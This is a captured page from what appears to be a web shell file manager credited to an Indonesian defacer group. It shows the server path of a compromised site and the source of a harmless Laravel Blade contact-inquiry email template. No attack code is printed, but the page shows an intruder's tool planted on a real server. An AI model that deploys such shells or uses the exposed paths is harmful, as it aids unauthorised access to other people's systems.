whoami7 - Manager
:
/
home
/
n170823s
/
public_html
/
steservicesltd.com
/
resources
/
views
/
emails
/
Upload File:
files >> /home/n170823s/public_html/steservicesltd.com/resources/views/emails/contact_mail.blade.php
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>New Inquiry - Warm Design</title> </head> <body style="margin:0; padding:0; background:#FDF8F0;"> <table width="100%" cellpadding="0" cellspacing="0" bgcolor="#FDF8F0"> <tr> <td align="center" style="padding:48px 20px;"> <!-- Warm card --> <table width="580" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" style="max-width:580px; width:100%;"> <!-- Decorative top --> <tr> <td height="6" bgcolor="#E8A87C" style="background:#E8A87C;"> </td> </tr> <!-- Spacer --> <tr> <td style="height:36px;"> </td> </tr> <!-- Header --> <tr> <td align="center" style="padding:0 32px;"> <p style="margin:0 0 12px 0; font-size:42px;">✨</p> <p style="margin:0 0 6px 0; font-size:12px; letter-spacing:2px; color:#C09A7A;">New inquiry received</p> <p style="margin:0; font-size:30px; font-weight:500; color:#4A3B32;">{{ $contact->fname }} {{ $contact->lname }}</p> </td> </tr> <!-- Divider --> <tr> <td style="padding:32px 32px 0 32px;"> <table width="100%" cellpadding="0" cellspacing="0"> <tr><td height="1" bgcolor="#F0E4D8"> </td></tr> </table> </td> </tr> <!-- Contact info --> <tr> <td style="padding:24px 32px;"> <table width="100%" cellpadding="0" cellspacing="0"> <tr> <td width="90" valign="top" style="padding:10px 0;"> <p style="margin:0; font-size:12px; color:#C09A7A;">📧 Email</p> </td> <td style="padding:10px 0;"> <a href="mailto:{{ $contact->email }}" style="color:#4A3B32; text-decoration:underline; font-size:15px;">{{ $contact->email }}</a> </td> </tr> <tr> <td width="90" valign="top" style="padding:10px 0;"> <p style="margin:0; font-size:12px; color:#C09A7A;">📞 Phone</p> </td> <td style="padding:10px 0;"> <a href="tel:{{ $contact->phone }}" style="color:#4A3B32; text-decoration:underline; font-size:15px;">{{ $contact->phone }}</a> </td> </tr> </table> </td> </tr> <!-- Divider --> <tr> <td style="padding:0 32px;"> <table width="100%" cellpadding="0" cellspacing="0"> <tr><td height="1" bgcolor="#F0E4D8"> </td></tr> </table> </td> </tr> <!-- Message area with warm background --> <tr> <td style="padding:24px 32px;"> <table width="100%" cellpadding="0" cellspacing="0" bgcolor="#FEF9F4" style="background:#FEF9F4;"> <tr> <td style="padding:22px 26px;"> <p style="margin:0 0 10px 0; font-size:11px; font-weight:600; color:#E8A87C; letter-spacing:1.5px;">💬 MESSAGE</p> <p style="margin:0; font-size:15px; color:#4A3B32; line-height:1.65;"> {{ $contact->message ?? 'No message provided.' }} </p> </td> </tr> </table> </td> </tr> <!-- Footer - completely clean, no tips, no automated text --> <tr> <td style="padding:28px 32px 40px 32px;"> </td> </tr> </table> </td> </tr> </table> </body> </html>
Copyright ©2021 || Defacer Indonesia